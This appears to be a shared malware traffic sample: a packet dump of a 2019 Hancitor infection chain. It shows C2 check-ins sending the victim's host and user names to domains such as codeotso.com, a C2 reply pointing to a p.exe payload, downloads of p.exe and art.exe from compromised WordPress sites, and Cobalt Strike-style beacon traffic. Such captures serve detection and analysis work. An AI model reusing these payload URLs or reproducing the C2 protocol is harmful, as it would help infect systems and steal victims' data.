Text Example

Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

Download Attachments

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f……
..e
….x.5.&E…………..codeotso.com…..
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6…….

..e.5.x.6……………codeotso.com……………..S…
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@….[
..eS……Po0W3…… ..T…………..
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6……CS…
..e.P..rM..o0W4`………..
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@….e
..eS……Po0W4rM..P….T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E….j@….~
..eS……Po0W4rM..P…….POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6……FS…
..e.P..rM..o0X.P….n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6……ES…
..e.P..rM..o0X.P….x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6…….

..e.5…8..sJ………..fordifortti.ru……………..Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@…..
..eMxs….PQd…….. ……………..
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6…….

..e.5…;..LS………..material-nerud.ru……………..\5. 2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0 E..,6......}Mxs. ..e.P.. DrUQd..…^.…..
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…..
..eMxs….PQd..
DrVP…v…
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E….r@…..
..eMxs….PQd..
DrVP…….POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6…….Mxs.
..e.P..
DrVQd..P…u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@…..
..e\5....P.]2....... ..[.............. 2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0 E..,6.....$.\5.
..e.P…..<.]2.....p...... 2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0 E..(.t@...." ..e\5….P.]2….=P……. 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@…..
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: material-nerud.ru Connection: Keep-Alive 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1 E..n.u@..... ..e\5….P.]2….=P…7…GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6…..$.\5`.
..e.P…..=.]4.P…….
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…6…….Mxs.
..e.P..
DrVQd..P… C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@…..
..eMxs….PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6……|Mxs.
..e.P..
Ds.Qd..P…tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6…….\5`.
..e.P…..=.]4.P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: “5d39c1ad-49400”
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…P.o..6.i.P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$….w.^| 5
..e.P..6.i..o..P…8…
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%….w.^| 5
..e.P…Q..L…`………..
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n(
..e^| 5…PL….Q..P…….
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…PL….Q..P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&….w.^| 5
..e.P…Q..L..CP….5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8’……S…
..e.P….p..Y.RP…….
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@….A
..eS……P.Y.R..p.P..+….
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(….rI^| 5
..e.P..6.i..o..P…….HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@…..
..eMxs….P..7.`.?-P…b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86……Mxs.
..e.P..`.?-..8.P….V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E…..@….{
..e.,.!. .P[^b0.#.jP…+…GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8……..,.!
..e.P. .#.j[^b.P…s…
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8……;S…
..e.P.!ZB..+..Q`………..
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..eS….!.P+..QZB..P….F..
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@….c
..eS….!.P+..QZB..P…6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8……>S…
..e.P.!ZB..+…P…….
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….3
..e.,.!.”.P.b…….. ……………..
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8……~Mxs.
..e.P……….P…….
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@….7
..eMxs….P……..P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E…8……..,.!
..e.P. .#.j[^b.P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E….r@….5
..e.,.!.#.P….?t.5P….2..GET /visit.js HTTP/1.1
Accept: /
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

Leave a Reply